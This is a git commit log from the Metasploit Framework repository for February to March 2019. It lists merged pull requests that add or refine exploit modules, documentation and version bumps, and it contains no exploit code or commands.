Metasploit	e46034df24	automatic module_metadata_base.json update	2019-03-05 20:01:56 -08:00
William Vu	db25dc7148	Land #11210 , imperva_securesphere_exec exploit	2019-03-05 19:53:54 -08:00
Metasploit	44d6b0b4b8	automatic module_metadata_base.json update	2019-03-05 19:40:08 -08:00
William Vu	22edc58e44	Land #11527 , .rubocop.yml TargetRubyVersion update And TrailingCommaInArrayLiteral fixes in my modules. :(	2019-03-05 19:32:15 -08:00
Metasploit	7804dca9c4	automatic module_metadata_base.json update	2019-03-05 19:18:42 -08:00
William Vu	2f24f2dfcf	Land #11481 , Drupal SA-CORE-2019-003/CVE-2019-6340	2019-03-05 19:10:46 -08:00
Metasploit	8179ee07e6	automatic module_metadata_base.json update	2019-03-05 10:52:04 -08:00
Wei Chen	83424eae5e	Land #11077 , Improvements and documentation for wing_ftp_admin_exec	2019-03-05 10:44:25 -08:00
Metasploit	472326aef5	automatic module_metadata_base.json update	2019-03-05 09:31:40 -08:00
Wei Chen	88997734c9	Land #11397 , Add checkJNDI to jboss_vulnscan plus a basic mod doc	2019-03-05 09:23:55 -08:00
Metasploit	1ac60d7c72	automatic module_metadata_base.json update	2019-03-05 09:13:48 -08:00
Wei Chen	3c9e546d2f	Land #11423 , Moved bruteforce(ip) under the sys_name check	2019-03-05 09:04:25 -08:00
Metasploit	3b8ad6aec2	automatic module_metadata_base.json update	2019-03-04 17:44:31 -08:00
William Vu	c390d968e5	Land #11519 , error check fix for Crock-Pot module	2019-03-04 17:37:12 -08:00
Metasploit	d94a54bd02	automatic module_metadata_base.json update	2019-03-04 17:29:43 -08:00
William Vu	56357b6d55	Land #11518 , Wemo module improvements	2019-03-04 17:21:54 -08:00
Metasploit	568a0becf7	automatic module_metadata_base.json update	2019-03-04 16:50:29 -08:00
William Vu	7118787707	Land #11517 , reverted CheckCode for Wemo exploit	2019-03-04 16:42:46 -08:00
Metasploit	2bc2224e2a	automatic module_metadata_base.json update	2019-03-04 16:36:26 -08:00
William Vu	c471f1ddb3	Land #11516 , reverted print for Wemo exploit	2019-03-04 16:26:59 -08:00
William Vu	0f583f1e49	Land #11464 , version checking for Wemo exploit	2019-03-04 16:20:11 -08:00
Brent Cook	dc10e04685	Land #11498 , add documentation for the 'jobs' command	2019-03-01 13:55:02 -08:00
Metasploit	7c9e9fc582	automatic module_metadata_base.json update	2019-03-01 12:18:31 -08:00
Brendan Coles	8c2798928e	Land #11500 , Add more checks to cisco_directory_traversal module	2019-03-01 12:10:37 -08:00
William Vu	19d2c05770	Land #11505 , pml_driver_config deprecation	2019-03-01 11:47:35 -08:00
Metasploit	3eb90325fd	automatic module_metadata_base.json update	2019-03-01 01:01:03 -08:00
Wei Chen	4de623db51	Land #11461 , Update manageengine_deviceexpert_traversal.rb	2019-03-01 00:51:26 -08:00
Metasploit	a36129b644	automatic module_metadata_base.json update	2019-02-28 14:24:26 -08:00
Brent Cook	3fbea002a1	Land #11445 , always save output with winrm_cmd	2019-02-28 14:13:58 -08:00
Metasploit	68261bf764	Bump version of framework to 4.17.45	2019-02-28 10:03:59 -08:00
h00die	ad259db3bc	Land #11447 http doc fixes	2019-02-26 17:28:34 -08:00
William Vu	829e274d0d	Land #11485 , VHOST support for full_uri	2019-02-26 08:38:48 -08:00
William Vu	6c3877d5ed	Land #11467 , CMDSTAGER::TEMP with WritableDir	2019-02-26 08:38:48 -08:00
Metasploit	3331c4e4b3	automatic module_metadata_base.json update	2019-02-25 12:29:46 -08:00
Brent Cook	bacf6d07e0	Land #11483 , update various modules to reflect current best practices Merge remote-tracking branch 'upstream/pr/11483' into upstream-master	2019-02-25 12:21:57 -08:00
Brent Cook	e71e3a97aa	Land #11446 , add msftidy support for SideEffects Stability Reliability check	2019-02-25 09:27:47 -08:00
Metasploit	c2a041942c	automatic module_metadata_base.json update	2019-02-22 16:14:25 -08:00
William Vu	d6abaa9059	Land #11465 , author name fixes in a couple modules	2019-02-22 16:02:39 -08:00
Metasploit	2a4c57a49e	automatic module_metadata_base.json update	2019-02-22 14:40:49 -08:00
William Vu	8f65ca4108	Land #11463 , NOCVE for Wemo exploit	2019-02-22 14:32:55 -08:00
Metasploit	5c3d221e48	automatic module_metadata_base.json update	2019-02-22 12:04:17 -08:00
Brent Cook	37c6bb3902	Land #11460 , Changing print_line to print_good	2019-02-22 12:04:17 -08:00
Brent Cook	d6e6f21a4d	Land #11462 , Add Reliability REPEATABLE_SESSION to Wemo exploit	2019-02-22 12:04:17 -08:00
Brent Cook	9c78298602	Land #11451 , update module authors to consume JSON cache	2019-02-22 12:04:17 -08:00
Metasploit	363c71ea60	Bump version of framework to 4.17.44	2019-02-21 21:26:33 -08:00
Metasploit	026d38943e	automatic module_metadata_base.json update	2019-02-21 20:50:47 -08:00
Pearce Barry	0da81ccff8	Land #11449 , enhance BigDecimal deprecation message suppression	2019-02-21 20:42:34 -08:00
Jacob Robles	f73b2dbc09	Land #11292 , Add exploit for Nuuo CMS SQL injection	2019-02-21 10:45:14 -08:00
Metasploit	1530b4b83f	Bump version of framework to 4.17.43	2019-02-21 10:03:17 -08:00